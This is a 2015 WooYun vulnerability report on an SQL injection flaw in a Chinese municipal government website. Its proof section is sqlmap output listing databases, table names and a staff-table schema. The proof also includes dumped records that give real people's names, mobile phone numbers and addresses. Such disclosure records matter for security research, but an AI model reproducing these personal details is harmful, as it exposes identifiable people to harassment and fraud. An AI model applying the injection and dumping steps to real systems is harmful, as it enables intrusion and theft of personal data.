漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0141787
漏洞标题:贵港市政府网SQL注入漏洞(近3w政府人员信息泄露)
相关厂商:cncert国家互联网应急中心
漏洞作者: 路人甲
提交时间:2015-09-19 21:14
修复时间:2015-11-05 17:06
公开时间:2015-11-05 17:06
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-09-19: 细节已通知厂商并且等待厂商处理中
2015-09-21: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-10-01: 细节向核心白帽子及相关领域专家公开
2015-10-11: 细节向普通白帽子公开
2015-10-21: 细节向实习白帽子公开
2015-11-05: 细节向公众公开
简要描述:
我是天空里的一片云,偶然投影在你的波心。
详细说明:
http://**.**.**.**/xzspjs.aspx?dep=ggzf
[16:16:21] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[16:16:21] [INFO] fetching database names
available databases [28]:
[*] ABMng
[*] BiaoDan
[*] DataStreamToExchange
[*] DataTransact
[*] DBdzjc
[*] GmcIMis
[*] GMCRepMis_In
[*] GMCRepMis_Out
[*] GscGMng
[*] GscMd_MonitorDataPublishToOuter
[*] GscMdLog
[*] GscMdMis
[*] GscMisReg
[*] GscPreMis
[*] GscXMLDeal
[*] GxGscIndividualData
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] sunhotel
[*] tempdb
[*] UnitDataExpress
[*] UnitFileExchangePlatform
[*] xinxicenter
[*] zfxxgk
[*] zxde
漏洞证明:
Database: GscGMng
[44 tables]
+-----------------------------+
| GscGAgency |
| GscGAgencyKind |
| GscGAppAgency |
| GscGAppChargeSet |
| GscGAppConditionSet |
| GscGAppDatumSet |
| GscGAppDocFile |
| GscGAppFlatOrg |
| GscGAppProject |
| GscGAppTypeText |
| GscGAppWarrantySet |
| GscGApprove |
| GscGApproveDatumSet |
| GscGBigTBNowUsing |
| GscGBiz |
| GscGConstAplObj |
| GscGCoorLog |
| GscGCoorLoginCount |
| GscGCoordination |
| GscGDay |
| GscGDept |
| GscGMisMaxNum |
| GscGMngDocFile |
| GscGMngOrgOfParentGsc |
| GscGOrg |
| GscGOrgApp |
| GscGOrgBiz |
| GscGOrgan |
| GscGPopedomGroup |
| GscGUser |
| GscGUserDisk |
| GscGUserPopedom |
| GscGWindow |
| GscGWindowForApproveProject |
| GscGWindowForGscOrgan |
| GscGWordType |
| GscGWorkBook |
| GscRecords |
| GscUAppOrg |
| GscUAppProject |
| ThisGGsc |
| ThisTBTSMP |
| 事项信息 |
| 人员信息 |
Database: GscGMng
Table: GscGUser
[42 columns]
+--------------------------------------+-----------+
| Column | Type |
+--------------------------------------+-----------+
| DateTimeOfJoinWork | datetime |
| GscCodeId | nvarchar |
| GscDeptCodeId | nvarchar |
| GscName | nvarchar |
| GscObjectStatusCodeId | nvarchar |
| GscOrganCodeId | nvarchar |
| GscUserAddress | nvarchar |
| GscUserBirthday | datetime |
| GscUserCodeId | nvarchar |
| GscUserDegreeCodeId | nvarchar |
| GscUserEducationCodeId | nvarchar |
| GscUserEmail | nvarchar |
| GscUserForeignLanguageLevel | nvarchar |
| GscUserHomePlace | nvarchar |
| GscUserIDCardNum | nvarchar |
| GscUserIsSupportCadre | bit |
| GscUserJobTypeCodeId | nvarchar |
| GscUserLinkTelephone | nvarchar |
| GscUserMarriageCodeId | nvarchar |
| GscUserMobileTel | nvarchar |
| GscUserName | nvarchar |
| GscUserNationCodeId | nvarchar |
| GscUserPartyCodeId | nvarchar |
| GscUserPhotoDocFile_GscDocFileTBName | nvarchar |
| GscUserPhotoDocFileGuid | nvarchar |
| GscUserPoliticalDuty | nvarchar |
| GscUserPoliticalRankCodeId | nvarchar |
| GscUserSexCodeId | nvarchar |
| GscUserSortOrderNum | int |
| GscUserTechnicalPostTitle | nvarchar |
| GscUserTypeCodeId | nvarchar |
| GscWindowCodeId | nvarchar |
| GscWorkCardNum | nvarchar |
| LocalTB_TSMP | bigint |
| LocalTB_UpdateDateTime | datetime |
| NoteOfGscUser | nvarchar |
| ReSetIPAndNotCheckKey | bit |
| SupportCadreTypeCodeId | nvarchar |
| TB_TSMP | timestamp |
| TBIdOfGscGUser | int |
| TopTB_TSMP | bigint |
| TopTB_UpdateDateTime | datetime |
+--------------------------------------+-----------+
随便跑几个字段,,晚上我不在家,请别查水表,谢谢
Database: GscGMng
Table: GscGUser
[28997 entries]
+---------------+-------------------+-------------------------+---------------------------------+---------------------------+
| GscName | GscUserName | GscUserMobileTel | GscUserAddress | GscUserIDCardNum |
+---------------+-------------------+-------------------------+---------------------------------+---------------------------+
| 灵山县政务服务中心 | 主系统管理员 | <blank> | <blank> | <blank> |
| 灵山县政务服务中心 | 电子监察员 | 13737753523 | 灵山县灵城镇 | <blank> |
| 灵山县政务服务中心 | 颜凯波 | 13877719568 | 灵山县灵城镇江南路 | <blank> |
| 灵山县政务服务中心 | 陈鹏昌 | 13788098022 | 灵城镇 | <blank> |
| 灵山县政务服务中心 | 江其凤 | 13977716959 | 灵城镇 | <blank> |
| 灵山县政务服务中心 | 陈基 | 13014973285 | 灵山县灵城镇 | <blank> |
浦北县政务服务中心 | 陈碧霞2222 | <blank> | <blank> | <blank> |
| 钦州市政务服务中心 | 周继宇 | 13097772626 | <blank> | <blank>
| 防城区政务服务中心 | 黄瑞津 | 13086700338 | 广西防城港市防城区防城镇站前路52号 | <blank> |
修复方案:
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2015-09-21 17:04
厂商回复:
CNVD确认所述情况,已经转由CNCERT下发给广西分中心,由其后续协调网站管理单位处置.
最新状态:
暂无